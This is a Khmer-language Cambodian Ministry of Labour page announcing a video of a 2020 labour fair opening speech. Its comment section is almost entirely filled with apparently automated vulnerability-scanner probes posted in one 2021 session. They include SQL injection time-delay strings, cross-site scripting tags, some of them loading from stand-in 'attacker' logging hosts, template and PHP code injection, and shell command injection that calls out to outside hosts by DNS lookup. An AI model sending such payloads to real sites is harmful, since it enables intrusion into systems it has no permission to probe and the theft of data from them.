ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

សុន្ទរកថាបើក ពិព័រណ៍ការងារ និងផលិតភាពជាតិ ឆ្នាំ២០២០ ដោយ ឯកឧត្តមបណ្ឌិត អ៊ិត សំហេង

វិដេអូ សុន្ទរកថាបើក ពិព័រណ៍ការងារ និងផលិតភាពជាតិ ឆ្នាំ២០២០ ដោយ ឯកឧត្តមបណ្ឌិតអ៊ិត សំហេង រដ្ឋមន្រ្តីក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ និងជាប្រធានគណៈកម្មាធិការជាតិបណ្តុះបណ្តាល

   
សំណួរ ឬ មតិយោបល់ ទៅសិក្ខាសាលា

 • pHqghUme

  2021-05-05 23:52:24


  @@th8zT


 • pHqghUme

  2021-05-05 23:52:18


  1'"


 • pHqghUme

  2021-05-05 23:52:17


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-05 23:51:57


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-05 23:51:41


  H0Vr9bHF')) OR 394=(SELECT 394 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-05 23:51:14


  eRCkfmTl') OR 878=(SELECT 878 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-05 23:50:50


  lOnkiScZ' OR 837=(SELECT 837 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-05 23:50:33


  -1)) OR 653=(SELECT 653 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-05 23:50:13


  -5) OR 229=(SELECT 229 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-05 23:49:59


  -5 OR 447=(SELECT 447 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-05 23:49:49


  1<14s2Xh<


 • pHqghUme

  2021-05-05 23:49:48


  YHP8Jxm6'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-05 23:49:37


  1<img sRc='http://attacker-9448/log.php?


 • pHqghUme

  2021-05-05 23:49:34


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-05 23:49:28


  1<soLRBx x=9520>


 • pHqghUme

  2021-05-05 23:49:23


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-05 23:49:22


  1<ifRAme sRc=9208.com></IfRamE>


 • pHqghUme

  2021-05-05 23:49:16


  1<WNX8J3>0HPDY[!+!]</WNX8J3>


 • pHqghUme

  2021-05-05 23:49:10


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-05 23:49:08


  1gE12G <ScRiPt >79Ej(9640)</ScRiPt>


 • pHqghUme

  2021-05-05 23:49:01


  1<% contenteditable onresize=79Ej(9150)>


 • pHqghUme

  2021-05-05 23:48:53


  1}body{acu:Expre/**/SSion(79Ej(9798))}


 • pHqghUme

  2021-05-05 23:48:53


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-05 23:48:45


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-05 23:48:43


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-05 23:48:32


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-05 23:48:25


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-05 23:48:09


  1<input autofocus onfocus=79Ej(9205)>


 • pHqghUme

  2021-05-05 23:48:06


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-05 23:48:02


  1&lt;ScRiPt&gt;79Ej(9572)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-05 23:47:54


  1\u003CScRiPt\79Ej(9804)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-05 23:47:53


  -1" OR 2+74-74-1=0+0+0+1 --


 • pHqghUme

  2021-05-05 23:47:52


  -1' OR 2+535-535-1=0+0+0+1 or 'DUQ8BPdK'='


 • pHqghUme

  2021-05-05 23:47:51


  -1' OR 2+680-680-1=0+0+0+1 --


 • pHqghUme

  2021-05-05 23:47:50


  -1 OR 2+682-682-1=0+0+0+1


 • pHqghUme

  2021-05-05 23:47:49


  -1 OR 2+592-592-1=0+0+0+1 --


 • pHqghUme

  2021-05-05 23:47:48


  0dB8NmNI


 • pHqghUme

  2021-05-05 23:47:48


  %31%3C%53%63%52%69%50%74%20%3E%37%39%45%6A%289929%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-05 23:47:39


  1<img/src=">" onerror=alert(9425)>


 • pHqghUme

  2021-05-05 23:47:32


  1<img src=xyz OnErRor=79Ej(9662)>


 • pHqghUme

  2021-05-05 23:47:27


  1<img src=//xss.bxss.me/t/dot.gif onload=79Ej(9368)>


 • pHqghUme

  2021-05-05 23:47:26


  1


 • pHqghUme

  2021-05-05 23:47:22


  1<body onload=79Ej(9368)>


 • pHqghUme

  2021-05-05 23:47:15


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9372'>


 • pHqghUme

  2021-05-05 23:47:12


  1


 • pHqghUme

  2021-05-05 23:47:10


  1<isindex type=image src=1 onerror=79Ej(9460)>


 • @@jYvhF

  2021-05-05 23:47:06


  1


 • pHqghUme

  2021-05-05 23:47:04


  1<ScRiPt >79Ej(9334)</ScRiPt>


 • 1'"

  2021-05-05 23:47:01


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-05 23:47:00


  1


 • pHqghUme

  2021-05-05 23:46:59


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9489></ScRiPt>


 • pHqghUme

  2021-05-05 23:46:54


  1<ScRiPt >79Ej(9167)</ScRiPt>


 • Jes47wMc')) OR 426=(SELECT 426 FROM PG_SLEEP(15))--

  2021-05-05 23:46:52


  1


 • pHqghUme

  2021-05-05 23:46:46


  1<ScR<ScRiPt>IpT>79Ej(9608)</sCr<ScRiPt>IpT>


 • eQkoez9H') OR 274=(SELECT 274 FROM PG_SLEEP(15))--

  2021-05-05 23:46:45


  1


 • pHqghUme

  2021-05-05 23:46:42


  1<script>79Ej(9628)</script>


 • pHqghUme

  2021-05-05 23:46:38


  1<WWZE4R>HFIMJ[!+!]</WWZE4R>


 • VXACtUGk' OR 954=(SELECT 954 FROM PG_SLEEP(15))--

  2021-05-05 23:46:37


  1


 • pHqghUme

  2021-05-05 23:46:31


  1<ScRiPt >79Ej(9592)</ScRiPt>


 • ENpe6wxH'; waitfor delay '0:0:15' --

  2021-05-05 23:46:28


  1


 • pHqghUme

  2021-05-05 23:46:26


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-05 23:46:22


  acx__${98991*97996}__::.x


 • 1 waitfor delay '0:0:15' --

  2021-05-05 23:46:20


  1


 • pHqghUme

  2021-05-05 23:46:17


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-05 23:46:10


  acx{{98991*97996}}xca


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-05 23:46:08


  1


 • pHqghUme

  2021-05-05 23:46:01


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-05 23:45:52


  <th:t="${acx}#foreach


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-05 23:45:47


  1


 • pHqghUme

  2021-05-05 23:45:46


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-05 23:45:30


  acu10221<s1﹥s2ʺs3ʹuca10221


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-05 23:45:24


  1


 • pHqghUme

  2021-05-05 23:45:20


  19500949


 • pHqghUme

  2021-05-05 23:45:12


  '"()&%<acx><ScRiPt >79Ej(9761)</ScRiPt>


 • pHqghUme

  2021-05-05 23:45:04


  1'"()&%<acx><ScRiPt >79Ej(9972)</ScRiPt>


 • if(now()=sysdate(),sleep(15),0)

  2021-05-05 23:45:00


  1


 • pHqghUme<PwKCsT<

  2021-05-05 23:44:57


  1


 • pHqghUme<img sRc='http://attacker-9541/log.php?

  2021-05-05 23:44:50


  1


 • pHqghUme<sQIQaQ x=9875>

  2021-05-05 23:44:44


  1


 • -1" OR 2+504-504-1=0+0+0+1 --

  2021-05-05 23:44:39


  1


 • -1' OR 2+616-616-1=0+0+0+1 or 'nziSpkOs'='

  2021-05-05 23:44:37


  1


 • -1' OR 2+430-430-1=0+0+0+1 --

  2021-05-05 23:44:36


  1


 • pHqghUme<ifRAme sRc=9620.com></IfRamE>

  2021-05-05 23:44:36


  1


 • -1 OR 2+650-650-1=0+0+0+1

  2021-05-05 23:44:34


  1


 • -1 OR 2+768-768-1=0+0+0+1 --

  2021-05-05 23:44:33


  1


 • EWApsn98

  2021-05-05 23:44:31


  1


 • pHqghUme<WMH9GR>I3DFU[!+!]</WMH9GR>

  2021-05-05 23:44:29


  1


 • pHqghUmemXtKx <ScRiPt >79Ej(9583)</ScRiPt>

  2021-05-05 23:44:21


  1


 • pHqghUme<% contenteditable onresize=79Ej(9256)>

  2021-05-05 23:44:14


  1


 • pHqghUme}body{acu:Expre/**/SSion(79Ej(9893))}

  2021-05-05 23:44:06


  1


 • pHqghUme

  2021-05-05 23:44:02


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-05 23:43:56


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-05 23:43:47


  1


 • pHqghUme<input autofocus onfocus=79Ej(9167)>

  2021-05-05 23:43:37


  1


 • pHqghUme

  2021-05-05 23:43:37


  1


 • pHqghUme&lt;ScRiPt&gt;79Ej(9846)&lt;/sCripT&gt;

  2021-05-05 23:43:22


  1


 • pHqghUme

  2021-05-05 23:43:15


  1


 • pHqghUme\u003CScRiPt\79Ej(9194)\u003C/sCripT\u003E

  2021-05-05 23:43:12


  1


 • pHqghUme

  2021-05-05 23:43:08


  1


 • pHqghUme

  2021-05-05 23:43:07


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%37%39%45%6A%289022%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-05 23:43:04


  1


 • pHqghUme<img/src=">" onerror=alert(9255)>

  2021-05-05 23:42:52


  1


 • pHqghUme

  2021-05-05 23:42:44


  1


 • pHqghUme<img src=xyz OnErRor=79Ej(9286)>

  2021-05-05 23:42:43


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=79Ej(9884)>

  2021-05-05 23:42:33


  1


 • pHqghUme<body onload=79Ej(9464)>

  2021-05-05 23:42:25


  1


 • pHqghUme

  2021-05-05 23:42:22


  1


 • pHqghUme

  2021-05-05 23:42:09


  1<0q7w6x<


 • pHqghUme

  2021-05-05 23:42:05


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9774'>

  2021-05-05 23:41:56


  1


 • pHqghUme<isindex type=image src=1 onerror=79Ej(9549)>

  2021-05-05 23:41:39


  1


 • pHqghUme

  2021-05-05 23:41:31


  1<img sRc='http://attacker-9662/log.php?


 • pHqghUme

  2021-05-05 23:41:29


  1


 • pHqghUme

  2021-05-05 23:40:54


  1<VRvnGe x=9705>


 • pHqghUme

  2021-05-05 23:40:43


  1<ifRAme sRc=9191.com></IfRamE>


 • pHqghUme<ScRiPt >79Ej(9471)</ScRiPt>

  2021-05-05 23:40:34


  1


 • pHqghUme

  2021-05-05 23:40:21


  1


 • pHqghUme

  2021-05-05 23:40:21


  1<WDEVTC>64JVC[!+!]</WDEVTC>


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9661></ScRiPt>

  2021-05-05 23:40:20


  1


 • pHqghUme

  2021-05-05 23:39:52


  1


 • pHqghUme<ScRiPt >79Ej(9264)</ScRiPt>

  2021-05-05 23:39:51


  1


 • pHqghUme

  2021-05-05 23:39:38


  1


 • pHqghUme

  2021-05-05 23:39:37


  1CmY7I <ScRiPt >c63w(9443)</ScRiPt>


 • pHqghUme

  2021-05-05 23:39:30


  1


 • pHqghUme<ScR<ScRiPt>IpT>79Ej(9201)</sCr<ScRiPt>IpT>

  2021-05-05 23:39:30


  1


 • pHqghUme

  2021-05-05 23:39:25


  1


 • pHqghUme

  2021-05-05 23:39:19


  1


 • pHqghUme

  2021-05-05 23:39:18


  1


 • pHqghUme

  2021-05-05 23:39:17


  1


 • pHqghUme

  2021-05-05 23:39:16


  1


 • pHqghUme

  2021-05-05 23:39:15


  1


 • pHqghUme

  2021-05-05 23:39:11


  1


 • pHqghUme<script>79Ej(9211)</script>

  2021-05-05 23:39:10


  1


 • pHqghUme

  2021-05-05 23:39:04


  1


 • pHqghUme

  2021-05-05 23:38:56


  1


 • pHqghUme<WIDFLB>GBAOX[!+!]</WIDFLB>

  2021-05-05 23:38:47


  1


 • pHqghUme

  2021-05-05 23:38:38


  1


 • pHqghUme

  2021-05-05 23:38:38


  1<% contenteditable onresize=c63w(9298)>


 • pHqghUme<ScRiPt >79Ej(9694)</ScRiPt>

  2021-05-05 23:38:37


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-05 23:38:30


  1


 • pHqghUme

  2021-05-05 23:38:26


  1


 • acx__${98991*97996}__::.x

  2021-05-05 23:38:22


  1


 • pHqghUme<QnifwB<

  2021-05-05 23:38:05


  1


 • pHqghUme<CJpKq1<

  2021-05-05 23:37:56


  1


 • pHqghUme

  2021-05-05 23:37:50


  1


 • pHqghUme<img sRc='http://attacker-9326/log.php?

  2021-05-05 23:37:41


  1


 • pHqghUme<img sRc='http://attacker-9489/log.php?

  2021-05-05 23:37:40


  1


 • pHqghUme

  2021-05-05 23:37:38


  1}body{acu:Expre/**/SSion(c63w(9806))}


 • acx[[${98991*97996}]]xca

  2021-05-05 23:37:30


  1


 • pHqghUme<uQBvpB x=9349>

  2021-05-05 23:37:24


  1


 • pHqghUme

  2021-05-05 23:37:24


  1


 • pHqghUme

  2021-05-05 23:37:02


  1


 • pHqghUme<xDopfy x=9420>

  2021-05-05 23:37:02


  1


 • acx{{98991*97996}}xca

  2021-05-05 23:36:48


  1


 • pHqghUme<ifRAme sRc=9024.com></IfRamE>

  2021-05-05 23:36:47


  1


 • pHqghUme

  2021-05-05 23:36:40


  1


 • pHqghUme<ifRAme sRc=9567.com></IfRamE>

  2021-05-05 23:36:27


  1


 • pHqghUme

  2021-05-05 23:36:24


  <a HrEF=jaVaScRiPT:>


 • pHqghUme<WQLUA0>KYIMB[!+!]</WQLUA0>

  2021-05-05 23:36:13


  1


 • pHqghUme

  2021-05-05 23:36:13


  1


 • pHqghUme<WRSZIN>NJRMP[!+!]</WRSZIN>

  2021-05-05 23:36:04


  1


 • pHqghUme

  2021-05-05 23:36:00


  1<HBTGM0<


 • pHqghUme

  2021-05-05 23:35:57


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-05 23:35:56


  1


 • pHqghUme

  2021-05-05 23:35:52


  <a HrEF=http://xss.bxss.me></a>


 • <th:t="${acx}#foreach

  2021-05-05 23:35:38


  1


 • pHqghUme

  2021-05-05 23:35:37


  1


 • <%={{={@{#{${acx}}%>

  2021-05-05 23:35:22


  1


 • pHqghUme

  2021-05-05 23:35:20


  1<img sRc='http://attacker-9241/log.php?


 • pHqghUme

  2021-05-05 23:35:18


  1


 • pHqghUme

  2021-05-05 23:35:12


  1<input autofocus onfocus=c63w(9243)>


 • acu7853<s1﹥s2ʺs3ʹuca7853

  2021-05-05 23:35:03


  1


 • pHqghUme

  2021-05-05 23:35:00


  1<bgjGn8 x=9862>


 • pHqghUmehdZtw <ScRiPt >oCqE(9368)</ScRiPt>

  2021-05-05 23:35:00


  1


 • pHqghUme9000060

  2021-05-05 23:34:53


  1


 • '"()&%<acx><ScRiPt >79Ej(9065)</ScRiPt>

  2021-05-05 23:34:41


  1


 • pHqghUmeNrPKI <ScRiPt >93nd(9356)</ScRiPt>

  2021-05-05 23:34:35


  1


 • pHqghUme

  2021-05-05 23:34:16


  1<ifRAme sRc=9549.com></IfRamE>


 • pHqghUme'"()&%<acx><ScRiPt >79Ej(9709)</ScRiPt>

  2021-05-05 23:34:15


  1


 • pHqghUme

  2021-05-05 23:34:09


  1


 • pHqghUme

  2021-05-05 23:34:02


  1&lt;ScRiPt&gt;c63w(9176)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-05 23:33:48


  1


 • pHqghUme

  2021-05-05 23:33:48


  1


 • pHqghUme

  2021-05-05 23:33:48


  1<WPBW3Y>ZNTC2[!+!]</WPBW3Y>


 • pHqghUme

  2021-05-05 23:33:47


  1


 • pHqghUme

  2021-05-05 23:33:46


  1


 • pHqghUme

  2021-05-05 23:33:45


  1


 • pHqghUme

  2021-05-05 23:33:44


  1


 • pHqghUme

  2021-05-05 23:33:42


  1


 • pHqghUme

  2021-05-05 23:33:39


  1


 • pHqghUme<% contenteditable onresize=oCqE(9767)>

  2021-05-05 23:33:35


  1


 • pHqghUme

  2021-05-05 23:33:25


  1


 • pHqghUme

  2021-05-05 23:33:20


  1


 • pHqghUme<% contenteditable onresize=93nd(9053)>

  2021-05-05 23:33:20


  1


 • pHqghUme

  2021-05-05 23:33:20


  1\u003CScRiPt\c63w(9629)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-05 23:33:16


  1


 • pHqghUme

  2021-05-05 23:33:16


  1jccAU <ScRiPt >ReVh(9486)</ScRiPt>


 • pHqghUme}body{acu:Expre/**/SSion(oCqE(9981))}

  2021-05-05 23:33:04


  1


 • pHqghUme

  2021-05-05 23:32:58


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-05 23:32:40


  1


 • pHqghUme

  2021-05-05 23:32:39


  1


 • pHqghUme

  2021-05-05 23:32:38


  1<% contenteditable onresize=ReVh(9776)>


 • pHqghUme}body{acu:Expre/**/SSion(93nd(9941))}

  2021-05-05 23:32:37


  1


 • pHqghUme

  2021-05-05 23:32:35


  1<img/src=">" onerror=alert(9480)>


 • pHqghUme

  2021-05-05 23:32:27


  1<img src=xyz OnErRor=c63w(9695)>


 • pHqghUme

  2021-05-05 23:32:24


  /xfs.bxss.me


 • /xfs.bxss.me

  2021-05-05 23:32:23


  1


 • pHqghUme

  2021-05-05 23:32:22


  1


 • pHqghUme

  2021-05-05 23:32:21


  '"


 • pHqghUme

  2021-05-05 23:32:21


  1


 • pHqghUme

  2021-05-05 23:32:21


  <!--


 • pHqghUme

  2021-05-05 23:32:20


  1


 • pHqghUme

  2021-05-05 23:32:20


  1


 • pHqghUme

  2021-05-05 23:32:19


  1


 • pHqghUme

  2021-05-05 23:32:17


  dP8aDrbpH3Ebe7W/.


 • '"

  2021-05-05 23:32:09


  1


 • pHqghUme

  2021-05-05 23:32:08


  1


 • pHqghUme

  2021-05-05 23:32:07


  1


 • pHqghUme

  2021-05-05 23:32:07


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-05 23:32:06


  1


 • pHqghUme

  2021-05-05 23:32:06


  dP8aDrbpH3Ebe7W


 • pHqghUme

  2021-05-05 23:32:06


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-05 23:32:06


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • pHqghUme

  2021-05-05 23:32:05


  1


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-05 23:32:05


  1


 • pHqghUme

  2021-05-05 23:32:05


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-05 23:32:04


  ";print(md5(31337));$a="


 • dP8aDrbpH3Ebe7W/.

  2021-05-05 23:32:04


  1


 • pHqghUme

  2021-05-05 23:32:03


  ';print(md5(31337));$a='


 • dP8aDrbpH3Ebe7W

  2021-05-05 23:32:03


  1


 • pHqghUme

  2021-05-05 23:32:02


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-05 23:32:02


  1


 • dP8aDrbpH3Ebe7W

  2021-05-05 23:32:02


  1


 • pHqghUme

  2021-05-05 23:32:01


  1


 • pHqghUme

  2021-05-05 23:32:00


  1


 • pHqghUme

  2021-05-05 23:31:59


  1


 • pHqghUme

  2021-05-05 23:31:55


  `(nslookup hitkevcintuii6ac20.bxss.me||perl -e "gethostbyname('hitkevcintuii6ac20.bxss.me')")`


 • pHqghUme

  2021-05-05 23:31:53


  |(nslookup hitlxajzdmhbf00a4d.bxss.me||perl -e "gethostbyname('hitlxajzdmhbf00a4d.bxss.me')")


 • ${@print(md5(31337))}\

  2021-05-05 23:31:50


  1


 • ${@print(md5(31337))}

  2021-05-05 23:31:49


  1


 • pHqghUme

  2021-05-05 23:31:48


  1


 • pHqghUme

  2021-05-05 23:31:47


  '+'A'.concat(70-3).concat(22*4).concat(115).concat(79).concat(111).concat(81)+(require'socket' Socket.gethostbyname('hitbw'+'zwwfzgtx8b2b0.bxss.me.')[3].to_s)+'


 • ";print(md5(31337));$a="

  2021-05-05 23:31:47


  1


 • pHqghUme

  2021-05-05 23:31:47


  1


 • pHqghUme

  2021-05-05 23:31:46


  "+"A".concat(70-3).concat(22*4).concat(101).concat(75).concat(120).concat(74)+(require"socket" Socket.gethostbyname("hitba"+"xehimadncb6af.bxss.me.")[3].to_s)+"


 • ';print(md5(31337));$a='

  2021-05-05 23:31:46


  1


 • '+'A'.concat(70-3).concat(22*4).concat(117).concat(87).concat(109).concat(84)+(require'socket' Socket.gethostbyname('hitqx'+'avexbjqt6d6a9.bxss.me.')[3].to_s)+'

  2021-05-05 23:31:45


  1


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-05 23:31:45


  1


 • pHqghUme<input autofocus onfocus=oCqE(9216)>

  2021-05-05 23:31:45


  1


 • "+"A".concat(70-3).concat(22*4).concat(104).concat(71).concat(122).concat(88)+(require"socket" Socket.gethostbyname("hitpx"+"hnjxhaje80c5b.bxss.me.")[3].to_s)+"

  2021-05-05 23:31:44


  1


 • pHqghUme

  2021-05-05 23:31:44


  1


 • pHqghUme

  2021-05-05 23:31:43


  1


 • pHqghUme

  2021-05-05 23:31:43


  1


 • pHqghUme

  2021-05-05 23:31:43


  $(nslookup hitpdakfjsnuzecff8.bxss.me||perl -e "gethostbyname('hitpdakfjsnuzecff8.bxss.me')")


 • pHqghUme

  2021-05-05 23:31:43


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-05 23:31:42


  1


 • pHqghUme

  2021-05-05 23:31:42


  (nslookup hitzdjxyoshasb402d.bxss.me||perl -e "gethostbyname('hitzdjxyoshasb402d.bxss.me')")


 • pHqghUme

  2021-05-05 23:31:42


  HttP://bxss.me/t/xss.html?%00


 • bxss.me/t/xss.html?%00

  2021-05-05 23:31:41


  1


 • pHqghUme

  2021-05-05 23:31:41


  1


 • pHqghUme

  2021-05-05 23:31:40


  &echo digktr$()\ nggubf\nz^xyu||a #' &echo digktr$()\ nggubf\nz^xyu||a #|" &echo digktr$()\ nggubf\nz^xyu||a #


 • HttP://bxss.me/t/xss.html?%00

  2021-05-05 23:31:40


  1


 • pHqghUme

  2021-05-05 23:31:40


  1<img src=//xss.bxss.me/t/dot.gif onload=c63w(9572)>


 • pHqghUme

  2021-05-05 23:31:40


  1


 • pHqghUme

  2021-05-05 23:31:40


  1


 • pHqghUme

  2021-05-05 23:31:40


  |echo bkjbog$()\ wnfqpv\nz^xyu||a #' |echo bkjbog$()\ wnfqpv\nz^xyu||a #|" |echo bkjbog$()\ wnfqpv\nz^xyu||a #


 • pHqghUme

  2021-05-05 23:31:39


  1


 • pHqghUme

  2021-05-05 23:31:39


  echo rxcxyi$()\ oqqdni\nz^xyu||a #' &echo rxcxyi$()\ oqqdni\nz^xyu||a #|" &echo rxcxyi$()\ oqqdni\nz^xyu||a #


 • pHqghUme

  2021-05-05 23:31:39


  1


 • pHqghUme

  2021-05-05 23:31:39


  1


 • pHqghUme

  2021-05-05 23:31:38


  1


 • pHqghUme

  2021-05-05 23:31:38


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-05 23:31:27


  1


 • pHqghUme

  2021-05-05 23:31:25


  1


 • pHqghUme

  2021-05-05 23:31:21


  1


 • '"()

  2021-05-05 23:31:20


  1


 • pHqghUme

  2021-05-05 23:31:20


  1


 • pHqghUme

  2021-05-05 23:31:19


  1&n928697=v970071


 • pHqghUme

  2021-05-05 23:31:19


  1


 • pHqghUme

  2021-05-05 23:31:18


  1


 • pHqghUme

  2021-05-05 23:31:15


  <a HrEF=jaVaScRiPT:>


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-05 23:31:10


  1


 • pHqghUme

  2021-05-05 23:31:10


  ".gethostbyname(lc("hitcw"."gqxmhvua64c25.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(75).chr(107).chr(82)."


 • pHqghUme

  2021-05-05 23:31:10


  1


 • pHqghUme

  2021-05-05 23:31:09


  '.gethostbyname(lc('hitue'.'ausajlyke3113.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(83).chr(112).chr(73).'


 • '.gethostbyname(lc('hitgz'.'hwwhxcewda271.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(78).chr(104).chr(67).'

  2021-05-05 23:31:08


  1


 • ".gethostbyname(lc("hitbr"."emygdvqq85647.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(87).chr(112).chr(75)."

  2021-05-05 23:31:08


  1


 • pHqghUme

  2021-05-05 23:31:07


  1


 • pHqghUme

  2021-05-05 23:31:07


  1


 • pHqghUme

  2021-05-05 23:31:06


  1


 • pHqghUme

  2021-05-05 23:31:05


  1


 • |(nslookup hitupooaptslh994e1.bxss.me||perl -e "gethostbyname('hitupooaptslh994e1.bxss.me')")

  2021-05-05 23:31:02


  1


 • pHqghUme

  2021-05-05 23:30:54


  http://bxss.me/t/fit.txt?.jpg


 • pHqghUme

  2021-05-05 23:30:53


  Http://bxss.me/t/fit.txt


 • pHqghUme

  2021-05-05 23:30:52


  1some_inexistent_file_with_long_name.jpg


 • pHqghUme

  2021-05-05 23:30:51


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg


 • pHqghUme&n927155=v943546

  2021-05-05 23:30:49


  1


 • bxss.me

  2021-05-05 23:30:49


  1


 • http://bxss.me/t/fit.txt?.jpg

  2021-05-05 23:30:48


  1


 • $(nslookup hittmiqokmzjj74971.bxss.me||perl -e "gethostbyname('hittmiqokmzjj74971.bxss.me')")

  2021-05-05 23:30:48


  1


 • (nslookup hitdixhduznsgab0b9.bxss.me||perl -e "gethostbyname('hitdixhduznsgab0b9.bxss.me')")

  2021-05-05 23:30:47


  1


 • Http://bxss.me/t/fit.txt

  2021-05-05 23:30:47


  1


 • pHqghUme

  2021-05-05 23:30:47


  ^(#$!@#$)(()))******


 • pHqghUme

  2021-05-05 23:30:46


  )


 • 1some_inexistent_file_with_long_name.jpg

  2021-05-05 23:30:46


  1


 • |echo lrndkh$()\ mvzoma\nz^xyu||a #' |echo lrndkh$()\ mvzoma\nz^xyu||a #|" |echo lrndkh$()\ mvzoma\nz^xyu||a #

  2021-05-05 23:30:46


  1


 • pHqghUme

  2021-05-05 23:30:46


  !(()&&!|*|*|


 • ^(#$!@#$)(()))******

  2021-05-05 23:30:45


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

  2021-05-05 23:30:45


  1


 • &echo ekzgds$()\ dloerx\nz^xyu||a #' &echo ekzgds$()\ dloerx\nz^xyu||a #|" &echo ekzgds$()\ dloerx\nz^xyu||a #

  2021-05-05 23:30:45


  1


 • pHqghUme

  2021-05-05 23:30:44


  1


 • echo dpuujb$()\ itbmxc\nz^xyu||a #' &echo dpuujb$()\ itbmxc\nz^xyu||a #|" &echo dpuujb$()\ itbmxc\nz^xyu||a #

  2021-05-05 23:30:44


  1


 • !(()&&!|*|*|

  2021-05-05 23:30:43


  1


 • )

  2021-05-05 23:30:42


  1


 • pHqghUme

  2021-05-05 23:30:42


  1


 • pHqghUme

  2021-05-05 23:30:40


  1


 • pHqghUme

  2021-05-05 23:30:39


  1<input autofocus onfocus=ReVh(9769)>


 • pHqghUme

  2021-05-05 23:30:39


  1


 • pHqghUme

  2021-05-05 23:30:38


  1


 • pHqghUme

  2021-05-05 23:30:38


  1


 • pHqghUme

  2021-05-05 23:30:37


  1


 • pHqghUme

  2021-05-05 23:30:37


  1


 • pHqghUme

  2021-05-05 23:30:36


  1


 • pHqghUme

  2021-05-05 23:30:35


  1


 • pHqghUme

  2021-05-05 23:30:35


  1


 • pHqghUme

  2021-05-05 23:30:34


  1


 • pHqghUme

  2021-05-05 23:30:33


  1


 • pHqghUme

  2021-05-05 23:30:32


  1


 • pHqghUme

  2021-05-05 23:30:31


  1<body onload=c63w(9268)>


 • pHqghUme

  2021-05-05 23:30:31


  1


 • pHqghUme

  2021-05-05 23:30:31


  1


 • pHqghUme

  2021-05-05 23:30:30


  1


 • pHqghUme

  2021-05-05 23:30:29


  1


 • pHqghUme

  2021-05-05 23:30:28


  1


 • pHqghUme

  2021-05-05 23:30:28


  1


 • pHqghUme

  2021-05-05 23:30:25


  1


 • pHqghUme

  2021-05-05 23:30:24


  1


